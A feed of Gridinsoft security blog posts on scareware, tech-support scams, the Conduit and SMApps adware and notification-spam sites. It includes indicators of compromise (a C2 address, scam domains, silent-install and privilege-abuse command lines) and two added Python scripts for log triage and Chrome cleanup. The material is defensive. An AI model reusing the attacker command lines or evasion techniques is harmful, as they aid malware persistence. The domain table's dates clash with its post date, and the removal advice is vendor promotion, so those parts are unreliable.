  • Ransomware is probably the worst case. This malware encrypts all data files on the victim’s computer, and the only chance to get them back is to buy a key from the racketeers.

Criminals can drop many other types of malware into the unsuspecting victim’s system. However, those are more suited to targeted attacks and require the hackers’ special attention. The malware mentioned above can work and bring profit automatically.

Scareware: How to Identify, Prevent and Remove It

How not to be fooled by scareware?

  • Install modern antivirus software. GridinSoft Anti-Malware is one of the best solutions on the market due to its combination of technical efficiency and cost-effectiveness. Its virus libraries are regularly updated, so whatever malware becomes recognized in the world, Anti-Malware will know how to deal with it. The program can perform deep scanning, work in on-run protection mode, and serve as a security measure for safe Internet browsing.
  • Know the signs before you get scammed. Scareware schemes work only because of people’s ignorance. You don’t need to be a hacker or even an advanced user; just take a simple course on Internet surfing from someone more experienced.
  • Don’t visit dubious websites, and avoid clicking on ad banners altogether. You will hardly encounter malicious advertising, which scareware surely is, on trustworthy websites like Google, YouTube or Facebook. It’s not that you should limit your surfing to these three sites, but they serve as examples of what a trustworthy website looks like. As soon as you see ad banners popping up all around you, flashing and glaring, proceed with great caution if you need to proceed at all.
  • Install ad-blocking software. It comes as a browser extension that blocks advertising banners from rendering. It might save you a lot of nerve cells.
  • If you happen to buy a scareware product, make sure you remove it the way you usually remove an application. In Windows, go to Start > Settings > Apps > Apps & Features, choose the app you want to remove, and then select Uninstall. After removing the scareware, carry out an antivirus scan to get rid of any accompanying malware.

The post Scareware: How to Identify, Prevent and Remove It appeared first on Gridinsoft Blog.

Pornographic Virus Alert From Microsoft
https://gridinsoft.com/blogs/pornographic-virus-alert-from-microsoft/
Tue, 14 May 2024 13:11:10 +0000
Microsoft shows you a banner which states that your PC is infected with a “Pornographic virus”? It seems that someone wants to involve you in a popular online tech support scam called “Pornographic virus alert from Microsoft”.

But how can they do it with a single banner? This article will show you the whole mechanism and explain why this notification appears so obsessively.

Pornographic virus alert from Microsoft: how it works and why it is malicious

One day, after opening the browser, you may see a banner which says that your PC is infected with awful viruses. As you can guess from the name of this alert, it also states that the virus got onto your PC from pornographic websites. To eliminate this malware, “Microsoft” asks you to contact its support by the number specified in the text. As they assure you, you cannot fix your computer without calling support. And here is the first suspicious element: the days when viruses could get onto the PC merely by opening a website are gone.

It was possible at the beginning of the ’00s, when browsers were immature and had a huge number of vulnerabilities. Some of these security holes allowed file downloads and installations to start without the user’s permission. But hold on, there are more interesting moments.

The appearance of the pornographic virus alert from Microsoft banner

Calling the support line as a sign of this banner’s malicious nature

The first thing is the number this banner offers as an official Microsoft helpline to reactivate your Windows. It is completely different from the one published on the Microsoft website. When you call this number, you will reach a “support agent” who will offer to take remote access to your PC. Sometimes such action is needed, when some program components work incorrectly on a specific PC configuration. But when we are talking about viruses that are already detected (as the banner says), the need for a remote connection to your PC is very questionable.

Finally, things get really ridiculous. The “support” checks your PC and then says that you really do have a lot of viruses. To remove them, you need to install a perfect solution they can offer you only today: an unknown (or low-trust) antivirus. They can send you a link or even install it themselves using the remote control. Installing unknown software was never a pleasant experience, and all these strange moments clearly show that this thing is not one you can trust. Usually, the program this “support” offers is a typical example of scareware. This sort of program mimics an antivirus app and shows you tons of false detections.

The total possible danger of the pornographic virus alert from Microsoft

Let’s count. The first danger the user faces is remote access. The person who gets the ability to manage your PC can literally do everything: delete your files, modify your settings, install any programs from any sources. He is a king now. Granting remote access must always be carefully weighed because of the dangers it carries. Nonetheless, a lot of users ignore that security rule and give access to anyone who offers help.

Moving on. Scareware may look like a fairly harmless but annoying app. But let this app stay active in your system for about 30 minutes, and you will not be able to use the PC as usual. Because of its malevolent nature, this unwanted program randomly blocks elements of important applications, so you can’t use those programs as usual. To remove these “malicious and vulnerable items”, you need to purchase the full version of this pseudo-antivirus. Moreover, you can’t uninstall the program the usual way, through the application list. Manual removal or the use of anti-malware software is the only option.

Example of scareware blocking Photoshop

Danger #0. The source malware.

And the last one, which should really be the first. I have not yet mentioned the initiator of that event: adware. The pornographic virus alert from Microsoft cannot appear on your PC on its own; access to such a page would simply be blocked by the web browser you use. So it is quite easy to conclude that something changed your browser configuration and networking settings to show you this banner every time you open your web browser. Adware is a kind of virus that usually does exactly this, which is why I supposed it is present. The way you get this virus on your PC may differ, and you can read the removal guide in that post. Fortunately, adware can easily be removed with anti-malware software.

The thing you can do to get rid of the banner right now is to close the browser window or reboot the PC. Radical ways, but pretty effective against this sort of scam. Usually, the banner does not have any “close” button in the top right corner. Don’t worry: the notification that “Microsoft Locked This Computer” is a 100% lie. Neither viruses nor companies can lock the computer through the Chrome browser. To prevent the banner from appearing, it is better to avoid using dubious sites. Things like torrent trackers or sites for downloading YouTube videos may redirect you to other pages, and this nasty thing is just one of them.

PUA:Win32/Conduit
https://gridinsoft.com/blogs/pua-win32-conduit/
Mon, 06 May 2024 14:46:26 +0000
PUA:Win32/Conduit is a potentially unwanted application that performs suspicious activity with the browser. It changes the homepage and search engine and installs extensions. It is distributed through hacked software or under the guise of “recommended software”.

PUA:Win32/Conduit Overview

PUA:Win32/Conduit (also known as PUAAdvertising:Win32/Conduit) is a potentially unwanted application belonging to Conduit Search. One of Conduit’s characteristic features is unwanted activity on the user’s device. It installs additional software and changes the current web browser settings without the user’s knowledge, which makes it a typical browser hijacker. At the same time, all of this is not easy to remove.

PUA:Win32/Conduit detection window

Conduit PUA usually changes the browser’s homepage and search engine to search.conduit[.]com without the user’s consent. It also installs a toolbar in some browsers, which can lead to unsolicited redirects to websites containing adverts or malware. In addition, Conduit often collects information about a user’s online activity, such as the history of websites visited, search queries entered, etc. As a result, this information may be used without the owner’s permission for fraudulent purposes or shared with third parties.

Technical Analysis

Let’s see how this infection behaves, using the example of a sample that masquerades as the ScreenHunter screen capture application.

The malware, represented by %SAMPLEPATH%\19a6fab0b940ce5a1334a9ec80aeae1e1d585a15d9eccc5cbc75ec972edd1269.exe, accepts command line arguments that control its behavior. It resolves many library functions dynamically at runtime rather than through the static import table, which makes it harder to detect statically.

Persistence And Privilege Escalation

Next, the malware establishes persistence by creating an undocumented autostart registry key:

HKEY_CURRENT_USER\Software\Wisdom-soft\toolbar

The malware also stores files in the Windows startup directory to ensure its execution on system boot. Attempts to load missing DLLs can be observed, indicating either evasion techniques or an effort to ensure the malware’s functionality. It dropped the following files into the %USERPROFILE%\AppData\Local\Temp\ folder:

~GLH0002.TMP
GLCAB3D.tmp
GLKAB48.tmp
GLH0007.TMP
GLC46CA.tmp

Conduit creates a process in suspended mode, suggesting code injection for stealthier execution. This tactic is often used by dropper malware.

Defense Evasion

As for evading detection, it’s standard fare for unwanted apps: Conduit encodes data using XOR, potentially to obfuscate its activities and evade detection. It also uses software packing to compress and encrypt its executables, making analysis and detection more difficult.

Unwanted Activity

It installs an Internet Explorer URL search hook, which lets it monitor and intercept web requests, potentially capturing the user’s browsing habits or sensitive information. Next, the application installs toolbars and browser helper objects to integrate itself with Internet Explorer. Such modifications can lead to unwanted browser behavior, including redirections, intrusive advertisements, and user data compromise.

Conduit toolbar and homepage

Additionally, by modifying registry keys and values that belong to the web browser, Conduit adds one more layer of persistence and detection evasion. These tricks allow the unwanted program to keep working even if something deletes the files from the autostart values/folders. To achieve this, the program modifies the following registry keys:

HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\URLSEARCHHOOKS
HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\TOOLBAR
HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS

How To Remove PUA:Win32/Conduit?

To remove PUA:Win32/Conduit, it is best to use an advanced solution. GridinSoft Anti-Malware is the best option because, in addition to removing unwanted software, it will reset web browsers in a couple of clicks. Moreover, GridinSoft Anti-Malware will provide your device with proactive protection.

SMApps Virus
https://gridinsoft.com/blogs/smapps-virus/
Tue, 09 Apr 2024 10:40:16 +0000
SMApps is a malicious program that aims to spread illegal promotions. It mainly attacks browsers by changing settings and redirecting search queries from Google to suspicious sites. The distribution methods are standard: malicious adverts and dodgy sites with hacked software.

This malware uses different detection evasion, anti-analysis, and persistence tactics. Although primarily positioned as adware, it can deliver other adware-like applications and log keystrokes.

SMApps Overview

SMApps is malware that falls under the designation of adware and browser hijacker. It mainly targets web browser settings, especially those for the search engine and homepage. After typing a search query on Google.com, a redirect to Bangsearch[.]pro occurs instead of the expected search results.

Registry entries of SMApps

Aside from Bangsearch, SMApps can promote literally any other engine, depending on who pays. Even when it sends the user to Yahoo or Bing, the results appear to be altered and may contain harmful content. In addition, fake search systems often collect sensitive user data, to a much greater extent than regular search providers.

At first glance, it may appear to be merely annoying, like most adware. However, this one is different. Detailed analysis has shown that SMApps can steal sensitive information from the victim’s device in addition to redirecting search queries. It can capture keystrokes, collect process information, and install additional payloads (usually other adware). Removal is tricky regardless of the infection path, because the malware uses various tricks to avoid it. I’ve analyzed this threat and found all the tricks it performs in the infected system; you can see it below.

Pop-up notification spam, one of the outcomes of SMApps

The main distribution channels for the SMApps virus are websites that distribute hacked software, and malicious ads. Shady pages offering add-ons or mods for popular games also contribute to spreading this malware. Moreover, it can spread by itself, replicating its files to USB drives and effectively acting like a worm, so be careful with what you plug into your USB port.

Technical Analysis

It was not hard to retrieve a sample of SMApps; malware analysis platforms are full of them. This one posed as some kind of hack for Roblox, which matches what I found about its distribution channels. Let’s peek into its internals and in-system activity.

Initial Access

In the Initial Access stage, SMApps uses various methods to gain a foothold in the target system. Then it uses Windows Management Instrumentation to query video device information and to check whether an antivirus product is installed. This serves as both system fingerprinting and an analysis/VM evasion step:

IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

This is often done to detect virtual machines. It also queries firmware table information and checks whether the current process is being debugged. Additionally, it queries disk information to detect virtual machines. To hinder dynamic analysis, the program may use medium and long sleeps (>= 30 seconds and >= 3 minutes respectively) and evasive loops.

Persistence & Privilege Escalation

SMApps gains persistence by creating or modifying Windows services, registry Run keys, and startup folders.

It invokes Windows Installer to arrange its further execution, hiding the window through the command line arguments:

"C:\Windows\system32\msiexec.exe" /I "C:\Users\\AppData\Local\Temp\tmphphvtapd" /qb ACCEPTEULA=1 LicenseAccepted=1

To gain more persistence and additional privileges, the program invokes the Windows Error Reporting service. This trick is rather popular these days, as it abuses the ability to relaunch a process with top privileges without showing a UAC prompt.

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 7280 -ip 7280
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3300 -ip 3300

Command Server Connection, Additional Installations

As for communications with the C2, SMApps uses the FTP protocol and a list of pre-determined addresses. In my case, 162.250.124.82:21 was the primary server. However, the connection does not produce much traffic: the malware just sends information about the infected system. More interesting things surfaced after letting the sample run in the background for a while.

As I said above, SMApps can act as a dropper. It dropped two files after installation:

IdealWeightOperator.exe
IdealWeightService.exe

These two malicious programs are pretty much the same as SMApps itself in terms of functionality. They change browser settings on top of what the original does, promoting questionable sites and spawning unwanted ads. Even though these threats are not really severe, the fact that SMApps is capable of dropping them is concerning.
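The behaviours described in this analysis (the two WMI fingerprinting queries, the long sleeps, the silent msiexec install from the Temp folder, the FTP connection to the command server and the two dropped executables) are the kind of events a sandbox or EDR log records one line at a time. The following Python triage script, an added example that is not Gridinsoft's code, runs simple rules over such lines and reports which of these behaviours appear. The log format (time, pid, event, arguments) and the "victim" user name are assumptions constructed for the sample; the WMI queries, the msiexec command line, the C2 address and the dropped file names are the ones reported above.

```python
"""Triage sandbox log lines for the SMApps behaviours described above.

Added example, not Gridinsoft's code. The log format and the 'victim' user
name are constructed; the indicators come from the analysis in the post.
"""
import re
from collections import Counter
from typing import Dict, List, Tuple

# C2 address reported in the analysis above.
KNOWN_C2 = {"162.250.124.82"}

WMI_RE = re.compile(r"ExecQuery.*FROM\s+(Win32_VideoController|AntiVirusProduct)\b", re.I)
SLEEP_RE = re.compile(r"\bSleep\s+(\d+)\b")
# msiexec /I "<something under \Temp\>" ... /qb or /qn: quiet install from a temp file.
MSI_TEMP_RE = re.compile(r'msiexec\.exe".*?/i\s+"[^"]*\\Temp\\[^"]*".*?/q[bn]\b', re.I)
FTP_RE = re.compile(r"\bconnect\s+(\d{1,3}(?:\.\d{1,3}){3}):21\b")
DROP_EXE_RE = re.compile(r"CreateFile\s+(C:\\Users\\\S+?\.exe)\b", re.I)

LONG_SLEEP_MS = 30_000  # the ">= 30 seconds" threshold mentioned above


def triage_line(line: str) -> List[str]:
    """Return the names of all rules that fire on one log line."""
    hits = []
    if WMI_RE.search(line):
        hits.append("anti-analysis WMI query")
    m = SLEEP_RE.search(line)
    if m and int(m.group(1)) >= LONG_SLEEP_MS:
        hits.append("long sleep (>= 30 s)")
    if MSI_TEMP_RE.search(line):
        hits.append("silent MSI install from Temp")
    m = FTP_RE.search(line)
    if m:
        hits.append("FTP to known C2" if m.group(1) in KNOWN_C2 else "outbound FTP")
    if DROP_EXE_RE.search(line):
        hits.append("executable dropped under user profile")
    return hits


def triage(log_text: str) -> List[Tuple[str, str]]:
    """Run every line through triage_line; returns (rule, line) pairs."""
    return [(rule, line) for line in log_text.splitlines()
            for rule in triage_line(line)]


def summary(findings: List[Tuple[str, str]]) -> Dict[str, int]:
    """Count findings per rule."""
    return dict(Counter(rule for rule, _ in findings))


# Constructed sample log (format and user name are assumptions).
SAMPLE_LOG = r"""12:00:01 pid=7280 IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
12:00:01 pid=7280 IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
12:00:02 pid=7280 CreateProcess "C:\Windows\system32\msiexec.exe" /I "C:\Users\victim\AppData\Local\Temp\tmphphvtapd" /qb ACCEPTEULA=1 LicenseAccepted=1
12:00:05 pid=7280 Sleep 30000
12:00:40 pid=3300 connect 162.250.124.82:21
12:00:41 pid=3300 CreateFile C:\Users\victim\AppData\Roaming\IdealWeight\IdealWeightOperator.exe
12:00:41 pid=3300 CreateFile C:\Users\victim\AppData\Roaming\IdealWeight\IdealWeightService.exe
12:00:42 pid=3300 CreateFile C:\Users\victim\Documents\notes.txt
12:00:43 pid=4100 connect 203.0.113.5:443
"""

if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for rule, line in found:
        print(f"[{rule}] {line}")
    print(summary(found))
```

The WerFault.exe launches seen above are deliberately not a rule: Windows Error Reporting runs legitimately on every crash, so a bare WerFault command line generates far too many false positives. What distinguishes this sample is the combination of fingerprinting queries, a quiet install from Temp and an FTP session from the same process tree, which is why the script reports per-rule counts rather than a single verdict.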

How To Remove SMApps?

To remove SMApps, you need an effective antivirus solution. I recommend GridinSoft Anti-Malware, as it will remove this malware without much effort. Users report problems removing this malware manually, hence a specialized tool is required. The GridinSoft program will also allow you to reset your browser in two clicks, which is especially useful when the browser has been tampered with by adware.

Re-Captha-Version Pop-Up Virus
https://gridinsoft.com/blogs/re-captha-version-pop-ups/
Wed, 20 Mar 2024 15:28:43 +0000
Recent user complaints show a new wave of malicious Re-Captha-Version website pop-ups. Such websites aim to force users into allowing pop-up notifications and send dozens of pop-up advertisements. Let me explain how this all works and how to stop pop-ups from appearing.

Let’s figure out what this scam is, and how to stop Re-Captha-Version pop-ups.

What are Re-Captha-Version pop-up notifications?

Re-Captha-Version is a browser notification spam campaign that takes place on an eponymous website. An entire network of such sites has similar names and content. All of them aim at one thing: forcing users to allow notifications under the guise of an anti-robot captcha. This enables the main course of the scam, huge numbers of pop-ups that flood both the web browser and the system notifications.

List of domains involved in the scam

Domain                           Registered
Re-captha-version-4-25.buzz      2024-11-18
Re-captha-version-4-23.buzz      2024-11-18
Re-captha-version-4-21.buzz      2024-11-18
Re-captha-version-3-271.buzz     2024-07-05
re-captha-version-3-275.buzz     2024-05-31
re-captha-version-3-278.buzz     2024-06-14
re-captha-version-3-290.buzz     2024-03-15
re-captha-version-3-298.buzz     2024-03-12
re-captha-version-5-1.com        2024-03-03
re-captha-version-3-73.fun       2024-02-13

Websites like Re-Captha-Version commonly appear after a redirect from another site, or after a click on a suspicious banner somewhere on the Web. If you try visiting such websites outside of the malicious redirects, they will likely return a blank page or various error messages. In some cases they work, but the content is the same as the first time: just the offer to enable pop-up notifications.

Common example of a Re-Captha website

But what is all this for? Promotions that such websites show are extremely cheap, but their volume multiplied by the number of victims yields quite a substantial profit. Considering that these frauds advertise other malicious actors, the profit may be spread across several cybercriminal groups. And while there are ways to earn more, and legitimately, pop-up spam campaigns are extremely easy to run. This is what keeps these fraudulent sites going.

How dangerous are Re-Captha-Version pop-up notifications?

Despite their looks, pop-ups are a rather dangerous thing, especially when dozens of them appear in a short period. The main effect is distraction: pop-ups keep appearing even after closing the browser. They clutter the notification tray, making it impossible to find the alerts you need.

Desktop notifications sent by a Recaptha site

But the key danger hides in the content of those promotions. The pages and offers they promote are not even remotely relevant. Moreover, the links these advertisements lead to are often clickbait websites or outright phishing pages. The longer this goes on, the more likely the user is to accidentally click one and end up in a sticky situation.

How to remove Re-Captha-Version?

Removing the pop-ups from the browser involves two steps: revoking notification permissions for all sites and scanning your system for threats. The first step is manual: go to your browser settings, open the notification settings page and delete all entries there. Then restart your browser for the changes to take effect.
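For Chrome, the per-site notification permissions that the manual step removes live in the profile's Preferences file, a JSON document under profile.content_settings.exceptions.notifications, where a setting of 1 means "allow" and 2 means "block". The following Python script, an added example that is not Gridinsoft's code, lists the origins that are currently allowed to send notifications and removes the grants whose domain follows the Re-Captha-Version naming scheme from the table above (or, optionally, every grant, as the text recommends). The default profile path, the sample preferences and the exact domain pattern are assumptions; Chrome must be closed while the file is edited, otherwise it overwrites the change on exit.

```python
"""Revoke Chrome notification grants given to Re-Captha-Version sites.

Added example, not Gridinsoft's code. Works on Chrome's per-profile
Preferences JSON; the path and the sample data below are assumptions.
Close Chrome before running clean_preferences_file().
"""
import copy
import json
import os
import re
import shutil
from pathlib import Path
from typing import Callable, Dict, List, Tuple

# Default profile location on Windows (assumption; adjust for other profiles/OSes).
CHROME_PREFS = (Path(os.environ.get("LOCALAPPDATA", "")) / "Google" / "Chrome"
                / "User Data" / "Default" / "Preferences")

# Chrome content-setting values.
ALLOW, BLOCK = 1, 2

# Naming scheme of the domains in the table above (assumption: the same family
# keeps using other numbers and TLDs).
SCAM_ORIGIN_RE = re.compile(r"^https?://re-captha-version-\d+-\d+\.[a-z]+(?::\d+)?$", re.I)


def notification_exceptions(prefs: dict) -> Dict[str, dict]:
    """Chrome's per-site notification settings (empty dict if none are stored)."""
    return (prefs.get("profile", {}).get("content_settings", {})
                 .get("exceptions", {}).get("notifications", {}))


def origin_of(pattern_key: str) -> str:
    """Keys look like 'https://example.com:443,*': primary pattern, then secondary."""
    return pattern_key.split(",", 1)[0]


def allowed_origins(prefs: dict) -> List[str]:
    """Origins currently allowed to show notifications, sorted."""
    return sorted(origin_of(k) for k, v in notification_exceptions(prefs).items()
                  if v.get("setting") == ALLOW)


def is_scam_origin(origin: str) -> bool:
    return bool(SCAM_ORIGIN_RE.match(origin))


def revoke(prefs: dict,
           should_revoke: Callable[[str], bool] = is_scam_origin) -> Tuple[dict, List[str]]:
    """Return a copy of prefs without the matching grants, plus the removed origins.
    Pass should_revoke=lambda o: True to drop every entry, as the text recommends."""
    new_prefs = copy.deepcopy(prefs)
    exceptions = notification_exceptions(new_prefs)
    removed = [k for k in exceptions if should_revoke(origin_of(k))]
    for k in removed:
        del exceptions[k]
    return new_prefs, [origin_of(k) for k in removed]


def clean_preferences_file(path: Path = CHROME_PREFS,
                           should_revoke: Callable[[str], bool] = is_scam_origin) -> List[str]:
    """Back up the Preferences file, then write it back without the matching grants."""
    prefs = json.loads(path.read_text(encoding="utf-8"))
    new_prefs, removed = revoke(prefs, should_revoke)
    shutil.copy2(path, path.with_suffix(".bak"))
    path.write_text(json.dumps(new_prefs), encoding="utf-8")
    return removed


# Constructed sample profile; the scam domains are taken from the table above.
SAMPLE_PREFS = {"profile": {"content_settings": {"exceptions": {"notifications": {
    "https://re-captha-version-3-290.buzz:443,*": {"last_modified": "13355000000000000", "setting": ALLOW},
    "https://re-captha-version-3-73.fun:443,*": {"last_modified": "13355000000000000", "setting": ALLOW},
    "https://mail.example.com:443,*": {"last_modified": "13355000000000000", "setting": ALLOW},
    "https://news.example.org:443,*": {"last_modified": "13355000000000000", "setting": BLOCK},
}}}}}

if __name__ == "__main__":
    cleaned, removed = revoke(SAMPLE_PREFS)
    print("removed:", removed)
    print("still allowed:", allowed_origins(cleaned))
```

Running allowed_origins() before cleaning is the useful diagnostic on a machine with this problem: a long list of origins you never knowingly granted, or any origin matching the pattern, confirms the notification-spam explanation even if the site itself is no longer reachable. Other Chromium browsers (Edge, Brave, Opera) use the same Preferences layout under their own profile directories, so only the path changes.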

For the second step, scanning for threats, I recommend GridinSoft Anti-Malware. Ads can lead to the installation of unwanted software, but aside from this, the appearance of the Re-Captha-Version website may itself be a sign of adware activity. To ensure that your device is clean, run a Standard scan and let it finish; it won’t take long.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the action the antimalware program takes on each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection: malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished
